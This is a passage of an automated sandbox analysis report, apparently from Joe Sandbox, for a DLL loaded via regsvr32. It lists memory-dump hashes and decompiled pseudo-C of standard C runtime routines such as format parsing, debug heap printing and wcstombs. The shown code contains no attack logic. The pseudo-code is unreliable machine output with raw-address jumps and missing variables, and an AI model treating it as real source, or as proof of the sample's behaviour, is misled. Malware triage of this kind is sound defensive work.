                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~__invalid_parameterget_int_arg
                                                                    • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2576288505-734865713
                                                                    • Opcode ID: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                    • Instruction ID: 14f8518244b6aa56c92c2133ed4feb23c5223715f37474fc6187c6031a63ef29
                                                                    • Opcode Fuzzy Hash: d152d77759d1a8b77c8e40c3a5b6b9e992a9212ee747c51bfdc081fcc3156ca6
                                                                    • Instruction Fuzzy Hash: 94414DB2A0C6C28AE7F09B64E8407BEB2E4F384746F600125D6C9875E8DB3DD444CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invoke_watson_if_oneof_swprintf_p
                                                                    • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                    • API String ID: 2731067127-3604075083
                                                                    • Opcode ID: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                    • Instruction ID: d4871e39cfd66166000c08c845a9e51e3e7b3f71581565f00727d2aef18c331a
                                                                    • Opcode Fuzzy Hash: fe7d44c8fd9bf19f096a73d3f0335bde0191fec95794c4c7e73345e4b193bd8e
                                                                    • Instruction Fuzzy Hash: C8415972A0D7C186E7A49B55E8903AEBBA0F784740FA14126E6CD47BA9DB3ED404CF10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 41%
                                                                    			E000007FE7FEF9D34F20(long long __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24, signed int _a32) {
                                                                    				void* _v16;
                                                                    				long long _v24;
                                                                    				long long _v32;
                                                                    				long long _v40;
                                                                    				long long _v48;
                                                                    				void* _v56;
                                                                    				signed int _v72;
                                                                    				long long _v80;
                                                                    				signed int _v88;
                                                                    				void* _t88;
                                                                    				void* _t89;
                                                                    				void* _t90;
                                                                    				void* _t92;
                                                                    				void* _t93;
                                                                    				void* _t101;
                                                                    				long long _t113;
                                                                    				intOrPtr _t116;
                                                                    				void* _t117;
                                                                    				long long _t118;
                                                                    				long long _t121;
                                                                    				long long _t122;
                                                                    				long long _t125;
                                                                    				void* _t164;
                                                                    
                                                                    				_t113 = __rax;
                                                                    				_a32 = r9d;
                                                                    				_a24 = __r8;
                                                                    				_a16 = __rdx;
                                                                    				_a8 = __rcx;
                                                                    				_v88 = E000007FE7FEF9D33B70(_a8, _a16, _a24);
                                                                    				E000007FE7FEF9D2E680(_t79, _t113);
                                                                    				_v80 = _t113;
                                                                    				0xf9d24000();
                                                                    				_v56 = _t113 + 0x100;
                                                                    				 *_v56 =  *_v56 + 1;
                                                                    				if (_v88 == 0xffffffff) goto 0xf9d35103;
                                                                    				if (_v88 - _a32 <= 0) goto 0xf9d35103;
                                                                    				if (_v88 - 0xffffffff <= 0) goto 0xf9d34fb9;
                                                                    				_t116 = _a24;
                                                                    				if (_v88 -  *((intOrPtr*)(_t116 + 4)) >= 0) goto 0xf9d34fb9;
                                                                    				goto 0xf9d34fbe;
                                                                    				E000007FE7FEF9D2E680(E000007FE7FEF9D2CF80(_t116), _t116);
                                                                    				_t117 = _t116 +  *((intOrPtr*)(_a24 + 8));
                                                                    				_v72 =  *((intOrPtr*)(_t117 + _v88 * 8));
                                                                    				_t88 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t117 + _v88 * 8)), _t117);
                                                                    				_t118 = _t117 +  *((intOrPtr*)(_a24 + 8));
                                                                    				if ( *((intOrPtr*)(_t118 + 4 + _v88 * 8)) == 0) goto 0xf9d35038;
                                                                    				_t89 = E000007FE7FEF9D2E680(_t88, _t118);
                                                                    				_v48 = _t118;
                                                                    				_t90 = E000007FE7FEF9D2E680(_t89, _t118);
                                                                    				_t121 = _v48 +  *((intOrPtr*)(_t118 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                    				_v40 = _t121;
                                                                    				goto 0xf9d35041;
                                                                    				_v40 = 0;
                                                                    				if (_v40 == 0) goto 0xf9d350f4;
                                                                    				r9d = _v72;
                                                                    				_t92 = E000007FE7FEF9D2E680(E000007FE7FEF9D33BD0(_t90, _a8, _a16, _a24), _t121);
                                                                    				_t122 = _t121 +  *((intOrPtr*)(_a24 + 8));
                                                                    				if ( *((intOrPtr*)(_t122 + 4 + _v88 * 8)) == 0) goto 0xf9d350c9;
                                                                    				_t93 = E000007FE7FEF9D2E680(_t92, _t122);
                                                                    				_v32 = _t122;
                                                                    				E000007FE7FEF9D2E680(_t93, _t122);
                                                                    				_t125 = _v32 +  *((intOrPtr*)(_t122 +  *((intOrPtr*)(_a24 + 8)) + 4 + _v88 * 8));
                                                                    				_v24 = _t125;
                                                                    				goto 0xf9d350d2;
                                                                    				_v24 = 0;
                                                                    				r8d = 0x103;
                                                                    				E000007FE7FEF9D2E6C0(E000007FE7FEF9D3D7E0(_v24, _a8, _t164), _t125, _v80);
                                                                    				goto 0xf9d350f6;
                                                                    				_v88 = _v72;
                                                                    				goto 0xf9d34f83;
                                                                    				0xf9d24000();
                                                                    				if ( *((intOrPtr*)(_t125 + 0x100)) <= 0) goto 0xf9d35131;
                                                                    				0xf9d24000();
                                                                    				_v16 = _t125 + 0x100;
                                                                    				 *_v16 =  *_v16 - 1;
                                                                    				if (_v88 == 0xffffffff) goto 0xf9d3514a;
                                                                    				if (_v88 - _a32 <= 0) goto 0xf9d3514a;
                                                                    				_t101 = E000007FE7FEF9D2CF80(_v16);
                                                                    				r9d = _v88;
                                                                    				return E000007FE7FEF9D33BD0(_t101, _a8, _a16, _a24);
                                                                    			}


























                                                                    0x7fef9d34f20
                                                                    0x7fef9d34f20
                                                                    0x7fef9d34f25
                                                                    0x7fef9d34f2a
                                                                    0x7fef9d34f2f
                                                                    0x7fef9d34f55
                                                                    0x7fef9d34f59
                                                                    0x7fef9d34f5e
                                                                    0x7fef9d34f63
                                                                    0x7fef9d34f6e
                                                                    0x7fef9d34f81
                                                                    0x7fef9d34f88
                                                                    0x7fef9d34f99
                                                                    0x7fef9d34fa4
                                                                    0x7fef9d34fa6
                                                                    0x7fef9d34fb5
                                                                    0x7fef9d34fb7
                                                                    0x7fef9d34fbe
                                                                    0x7fef9d34fcf
                                                                    0x7fef9d34fda
                                                                    0x7fef9d34fde
                                                                    0x7fef9d34fef
                                                                    0x7fef9d34ffc
                                                                    0x7fef9d34ffe
                                                                    0x7fef9d35003
                                                                    0x7fef9d35008
                                                                    0x7fef9d3502e
                                                                    0x7fef9d35031
                                                                    0x7fef9d35036
                                                                    0x7fef9d35038
                                                                    0x7fef9d35047
                                                                    0x7fef9d3504d
                                                                    0x7fef9d3506f
                                                                    0x7fef9d35080
                                                                    0x7fef9d3508d
                                                                    0x7fef9d3508f
                                                                    0x7fef9d35094
                                                                    0x7fef9d35099
                                                                    0x7fef9d350bf
                                                                    0x7fef9d350c2
                                                                    0x7fef9d350c7
                                                                    0x7fef9d350c9
                                                                    0x7fef9d350d2
                                                                    0x7fef9d350ef
                                                                    0x7fef9d350f4
                                                                    0x7fef9d350fa
                                                                    0x7fef9d350fe
                                                                    0x7fef9d35103
                                                                    0x7fef9d3510f
                                                                    0x7fef9d35111
                                                                    0x7fef9d3511c
                                                                    0x7fef9d3512f
                                                                    0x7fef9d35136
                                                                    0x7fef9d35143
                                                                    0x7fef9d35145
                                                                    0x7fef9d3514a
                                                                    0x7fef9d35170

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: State$_inconsistency$BaseControlCurrentFromImage
                                                                    • String ID:
                                                                    • API String ID: 2452617236-0
                                                                    • Opcode ID: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                    • Instruction ID: 79c6626e7a9320abdad6ed0e53fbdedc274fcc22452831ee93149e628ab3cd95
                                                                    • Opcode Fuzzy Hash: 03736bbfa20cfa1d6e80738f38b28c8345d2a0856ef117f7f635166efef2818c
                                                                    • Instruction Fuzzy Hash: EC61F132A0DA8586DAB0DB55E45177EB3A0F7C4789F214625E6CD83B6ACB3ED441CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 27%
                                                                    			E000007FE7FEF9D29F20(intOrPtr __ecx, intOrPtr* __rax, intOrPtr _a8) {
                                                                    				long long _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				int _v28;
                                                                    				int _v32;
                                                                    				char _v64;
                                                                    				long long _v72;
                                                                    				intOrPtr _t29;
                                                                    				intOrPtr* _t41;
                                                                    
                                                                    				_t41 = __rax;
                                                                    				_a8 = __ecx;
                                                                    				_v16 = 0xfffffffe;
                                                                    				_v72 = 0;
                                                                    				0xf9d266b0();
                                                                    				 *0xf9d4cd68 = 0;
                                                                    				if (_a8 != 0xfffffffe) goto 0xf9d29f81;
                                                                    				 *0xf9d4cd68 = 1;
                                                                    				_v32 = GetOEMCP();
                                                                    				E000007FE7FEF9D26800( &_v64);
                                                                    				goto 0xf9d29fe3;
                                                                    				if (_a8 != 0xfffffffd) goto 0xf9d29fae;
                                                                    				 *0xf9d4cd68 = 1;
                                                                    				_v28 = GetACP();
                                                                    				E000007FE7FEF9D26800( &_v64);
                                                                    				_t29 = _v28;
                                                                    				goto 0xf9d29fe3;
                                                                    				if (_a8 != 0xfffffffc) goto 0xf9d29fe3;
                                                                    				 *0xf9d4cd68 = 1;
                                                                    				E000007FE7FEF9D26840(_t29,  &_v64);
                                                                    				_v24 =  *((intOrPtr*)( *_t41 + 4));
                                                                    				E000007FE7FEF9D26800( &_v64);
                                                                    				goto 0xf9d29ff9;
                                                                    				_v20 = _a8;
                                                                    				E000007FE7FEF9D26800( &_v64);
                                                                    				return _v20;
                                                                    			}












                                                                    0x7fef9d29f20
                                                                    0x7fef9d29f20
                                                                    0x7fef9d29f28
                                                                    0x7fef9d29f31
                                                                    0x7fef9d29f44
                                                                    0x7fef9d29f4a
                                                                    0x7fef9d29f59
                                                                    0x7fef9d29f5b
                                                                    0x7fef9d29f6b
                                                                    0x7fef9d29f74
                                                                    0x7fef9d29f7f
                                                                    0x7fef9d29f86
                                                                    0x7fef9d29f88
                                                                    0x7fef9d29f98
                                                                    0x7fef9d29fa1
                                                                    0x7fef9d29fa6
                                                                    0x7fef9d29fac
                                                                    0x7fef9d29fb3
                                                                    0x7fef9d29fb5
                                                                    0x7fef9d29fc4
                                                                    0x7fef9d29fcf
                                                                    0x7fef9d29fd8
                                                                    0x7fef9d29fe1
                                                                    0x7fef9d29fe7
                                                                    0x7fef9d29ff0
                                                                    0x7fef9d29ffd

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_
                                                                    • String ID:
                                                                    • API String ID: 1901436342-0
                                                                    • Opcode ID: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                    • Instruction ID: 704f50b174c78f8dad9e9ad97ccd9f8c7b4629f2dc49822da5bcfb1c8acb2663
                                                                    • Opcode Fuzzy Hash: 69024ba52bd34e7b32b0e788ec4f64afe9409c237456bc3d803b93947163d83b
                                                                    • Instruction Fuzzy Hash: 2E21A732D0C64186E7A09B28E84436EBBA0E784768F614226E3DD426F9DB7ED545CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter
                                                                    • String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c$sizeInBytes > retsize
                                                                    • API String ID: 2123368286-552404435
                                                                    • Opcode ID: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                    • Instruction ID: a80555c9662aee50eaf55af6b2d7c09464ca7ea00ccabcf41043a4b878837ec0
                                                                    • Opcode Fuzzy Hash: f12e70934a7f8eca6376172156a370be3a7c923ed3c4affde7108b6e7297d87f
                                                                    • Instruction Fuzzy Hash: 4B511726A0DBC586E6B48B19E84476EB3E0F386361F204625D6ED43BE8DF7ED4458B01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 28%
                                                                    			E000007FE7FEF9D3BCBD(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a696, intOrPtr _a704, char _a968, char _a972, signed int _a976, void* _a1096, char _a1112) {
                                                                    				void* _t184;
                                                                    				char* _t204;
                                                                    				char* _t205;
                                                                    
                                                                    				_a112 = 0;
                                                                    				_a108 = _a112;
                                                                    				_a88 = _a108;
                                                                    				_a92 = _a88;
                                                                    				_a80 = 0;
                                                                    				_a116 = 0xffffffff;
                                                                    				_a76 = 0;
                                                                    				_a968 = _a696 & 0x000000ff;
                                                                    				if (_a968 == 0x20) goto 0xf9d3bd57;
                                                                    				if (_a968 == 0x23) goto 0xf9d3bd64;
                                                                    				if (_a968 == 0x2b) goto 0xf9d3bd4a;
                                                                    				if (_a968 == 0x2d) goto 0xf9d3bd3d;
                                                                    				if (_a968 == 0x30) goto 0xf9d3bd72;
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000001;
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000002;
                                                                    				goto 0xf9d3bd7d;
                                                                    				asm("bts eax, 0x7");
                                                                    				goto 0xf9d3bd7d;
                                                                    				_a80 = _a80 | 0x00000008;
                                                                    				if (_a696 != 0x2a) goto 0xf9d3bdbe;
                                                                    				_t204 =  &_a1112;
                                                                    				_a88 = E000007FE7FEF9D31E40(_t204);
                                                                    				if (_a88 >= 0) goto 0xf9d3bdbc;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				_a88 =  ~_a88;
                                                                    				goto 0xf9d3bdd5;
                                                                    				_a88 = _t184 + _t204 - 0x30;
                                                                    				_a116 = 0;
                                                                    				if (_a696 != 0x2a) goto 0xf9d3be16;
                                                                    				_t205 =  &_a1112;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t205);
                                                                    				if (_a116 >= 0) goto 0xf9d3be14;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3be2d;
                                                                    				_a116 = _t184 + _t205 - 0x30;
                                                                    				_a972 = _a696 & 0x000000ff;
                                                                    				if (_a972 == 0x49) goto 0xf9d3beb7;
                                                                    				if (_a972 == 0x68) goto 0xf9d3bfc0;
                                                                    				if (_a972 == 0x6c) goto 0xf9d3be76;
                                                                    				if (_a972 == 0x77) goto 0xf9d3bfcd;
                                                                    				goto 0xf9d3bfd9;
                                                                    				if ( *_a1096 != 0x6c) goto 0xf9d3bea7;
                                                                    				_a1096 = _a1096 + 1;
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3beb2;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xf");
                                                                    				if ( *_a1096 != 0x36) goto 0xf9d3bf09;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x34) goto 0xf9d3bf09;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 != 0x33) goto 0xf9d3bf4c;
                                                                    				if ( *((char*)(_a1096 + 1)) != 0x32) goto 0xf9d3bf4c;
                                                                    				_a1096 = _a1096 + 2;
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3bfbe;
                                                                    				if ( *_a1096 == 0x64) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x69) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x6f) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x75) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 == 0x78) goto 0xf9d3bfac;
                                                                    				if ( *_a1096 != 0x58) goto 0xf9d3bfae;
                                                                    				goto 0xf9d3bfbe;
                                                                    				_a704 = 0;
                                                                    				goto E000007FE7FEF9D3BB66;
                                                                    				goto 0xf9d3bfd9;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3bfd9;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a976 = _a696;
                                                                    				_a976 = _a976 - 0x41;
                                                                    				if (_a976 - 0x37 > 0) goto 0xf9d3ca31;
                                                                    				goto __rax;
                                                                    			}






                                                                    0x7fef9d3bcbd
                                                                    0x7fef9d3bcc9
                                                                    0x7fef9d3bcd1
                                                                    0x7fef9d3bcd9
                                                                    0x7fef9d3bcdd
                                                                    0x7fef9d3bce5
                                                                    0x7fef9d3bced
                                                                    0x7fef9d3bd02
                                                                    0x7fef9d3bd11
                                                                    0x7fef9d3bd1b
                                                                    0x7fef9d3bd25
                                                                    0x7fef9d3bd2f
                                                                    0x7fef9d3bd39
                                                                    0x7fef9d3bd3b
                                                                    0x7fef9d3bd44
                                                                    0x7fef9d3bd48
                                                                    0x7fef9d3bd51
                                                                    0x7fef9d3bd55
                                                                    0x7fef9d3bd5e
                                                                    0x7fef9d3bd62
                                                                    0x7fef9d3bd68
                                                                    0x7fef9d3bd70
                                                                    0x7fef9d3bd79
                                                                    0x7fef9d3bd8d
                                                                    0x7fef9d3bd8f
                                                                    0x7fef9d3bd9c
                                                                    0x7fef9d3bda5
                                                                    0x7fef9d3bdae
                                                                    0x7fef9d3bdb8
                                                                    0x7fef9d3bdbc
                                                                    0x7fef9d3bdd1
                                                                    0x7fef9d3bdda
                                                                    0x7fef9d3bdf2
                                                                    0x7fef9d3bdf4
                                                                    0x7fef9d3be01
                                                                    0x7fef9d3be0a
                                                                    0x7fef9d3be0c
                                                                    0x7fef9d3be14
                                                                    0x7fef9d3be29
                                                                    0x7fef9d3be3a
                                                                    0x7fef9d3be49
                                                                    0x7fef9d3be53
                                                                    0x7fef9d3be61
                                                                    0x7fef9d3be6b
                                                                    0x7fef9d3be71
                                                                    0x7fef9d3be84
                                                                    0x7fef9d3be91
                                                                    0x7fef9d3be9d
                                                                    0x7fef9d3bea5
                                                                    0x7fef9d3beae
                                                                    0x7fef9d3beb2
                                                                    0x7fef9d3bebb
                                                                    0x7fef9d3bed1
                                                                    0x7fef9d3bee2
                                                                    0x7fef9d3bef0
                                                                    0x7fef9d3befc
                                                                    0x7fef9d3bf04
                                                                    0x7fef9d3bf17
                                                                    0x7fef9d3bf28
                                                                    0x7fef9d3bf36
                                                                    0x7fef9d3bf42
                                                                    0x7fef9d3bf4a
                                                                    0x7fef9d3bf5a
                                                                    0x7fef9d3bf6a
                                                                    0x7fef9d3bf7a
                                                                    0x7fef9d3bf8a
                                                                    0x7fef9d3bf9a
                                                                    0x7fef9d3bfaa
                                                                    0x7fef9d3bfac
                                                                    0x7fef9d3bfae
                                                                    0x7fef9d3bfb9
                                                                    0x7fef9d3bfbe
                                                                    0x7fef9d3bfc7
                                                                    0x7fef9d3bfcb
                                                                    0x7fef9d3bfd1
                                                                    0x7fef9d3bfe6
                                                                    0x7fef9d3bff7
                                                                    0x7fef9d3c006
                                                                    0x7fef9d3c02d

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914647575.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                    • Associated: 00000003.00000002.914644527.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914674524.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914682301.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000003.00000002.914686597.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                    • String ID: ("Incorrect format specifier", 0)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                    • API String ID: 2192614184-192189897
                                                                    • Opcode ID: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                    • Instruction ID: 366f55b25be61a8d80973343189ccb34eb8cf05d0f6555861afeb0151a731927
                                                                    • Opcode Fuzzy Hash: 838c9af7f6c21a6938ef5e99847a712facd56587850898e9071408f632ec2777
                                                                    • Instruction Fuzzy Hash: 1A414C72A0D6C28AE3B0DB24E8547BEB7E4F384345F600126E6D887AA9DB7DD541CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 28%
                                                                    			E000007FE7FEF9D3DC6B(intOrPtr _a76, signed int _a80, signed int _a88, signed int _a92, signed int _a108, signed int _a112, intOrPtr _a116, signed int _a1208, intOrPtr _a1216, signed int _a1404, signed int _a1408, signed int _a1412, signed short* _a1544, char _a1560) {
                                                                    				void* _t184;
                                                                    				char* _t204;
                                                                    				char* _t205;
                                                                    
                                                                    				_a112 = 0;
                                                                    				_a108 = _a112;
                                                                    				_a88 = _a108;
                                                                    				_a92 = _a88;
                                                                    				_a80 = 0;
                                                                    				_a116 = 0xffffffff;
                                                                    				_a76 = 0;
                                                                    				_a1404 = _a1208 & 0x0000ffff;
                                                                    				if (_a1404 == 0x20) goto 0xf9d3dd05;
                                                                    				if (_a1404 == 0x23) goto 0xf9d3dd12;
                                                                    				if (_a1404 == 0x2b) goto 0xf9d3dcf8;
                                                                    				if (_a1404 == 0x2d) goto 0xf9d3dceb;
                                                                    				if (_a1404 == 0x30) goto 0xf9d3dd20;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000001;
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000002;
                                                                    				goto 0xf9d3dd2b;
                                                                    				asm("bts eax, 0x7");
                                                                    				goto 0xf9d3dd2b;
                                                                    				_a80 = _a80 | 0x00000008;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3dd6c;
                                                                    				_t204 =  &_a1560;
                                                                    				_a88 = E000007FE7FEF9D31E40(_t204);
                                                                    				if (_a88 >= 0) goto 0xf9d3dd6a;
                                                                    				_a80 = _a80 | 0x00000004;
                                                                    				_a88 =  ~_a88;
                                                                    				goto 0xf9d3dd83;
                                                                    				_a88 = _t184 + _t204 - 0x30;
                                                                    				_a116 = 0;
                                                                    				if ((_a1208 & 0x0000ffff) != 0x2a) goto 0xf9d3ddc4;
                                                                    				_t205 =  &_a1560;
                                                                    				_a116 = E000007FE7FEF9D31E40(_t205);
                                                                    				if (_a116 >= 0) goto 0xf9d3ddc2;
                                                                    				_a116 = 0xffffffff;
                                                                    				goto 0xf9d3dddb;
                                                                    				_a116 = _t184 + _t205 - 0x30;
                                                                    				_a1408 = _a1208 & 0x0000ffff;
                                                                    				if (_a1408 == 0x49) goto 0xf9d3de66;
                                                                    				if (_a1408 == 0x68) goto 0xf9d3df6f;
                                                                    				if (_a1408 == 0x6c) goto 0xf9d3de24;
                                                                    				if (_a1408 == 0x77) goto 0xf9d3df7c;
                                                                    				goto 0xf9d3df88;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x6c) goto 0xf9d3de56;
                                                                    				_a1544 =  &(_a1544[1]);
                                                                    				asm("bts eax, 0xc");
                                                                    				goto 0xf9d3de61;
                                                                    				_a80 = _a80 | 0x00000010;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xf");
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x36) goto 0xf9d3deb8;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x34) goto 0xf9d3deb8;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("bts eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x33) goto 0xf9d3defb;
                                                                    				if ((_a1544[1] & 0x0000ffff) != 0x32) goto 0xf9d3defb;
                                                                    				_a1544 =  &(_a1544[2]);
                                                                    				asm("btr eax, 0xf");
                                                                    				goto 0xf9d3df6d;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x64) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x69) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x6f) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x75) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) == 0x78) goto 0xf9d3df5b;
                                                                    				if (( *_a1544 & 0x0000ffff) != 0x58) goto 0xf9d3df5d;
                                                                    				goto 0xf9d3df6d;
                                                                    				_a1216 = 0;
                                                                    				goto E000007FE7FEF9D3DC41;
                                                                    				goto 0xf9d3df88;
                                                                    				_a80 = _a80 | 0x00000020;
                                                                    				goto 0xf9d3df88;
                                                                    				asm("bts eax, 0xb");
                                                                    				_a1412 = _a1208 & 0x0000ffff;
                                                                    				_a1412 = _a1412 - 0x41;
                                                                    				if (_a1412 - 0x37 > 0) goto 0xf9d3ea2a;
                                                                    				goto __rax;
                                                                    			}






                                                                    0x7fef9d3dc6b
                                                                    0x7fef9d3dc77
                                                                    0x7fef9d3dc7f
                                                                    0x7fef9d3dc87
                                                                    0x7fef9d3dc8b
                                                                    0x7fef9d3dc93
                                                                    0x7fef9d3dc9b
                                                                    0x7fef9d3dcb0
                                                                    0x7fef9d3dcbf
                                                                    0x7fef9d3dcc9
                                                                    0x7fef9d3dcd3
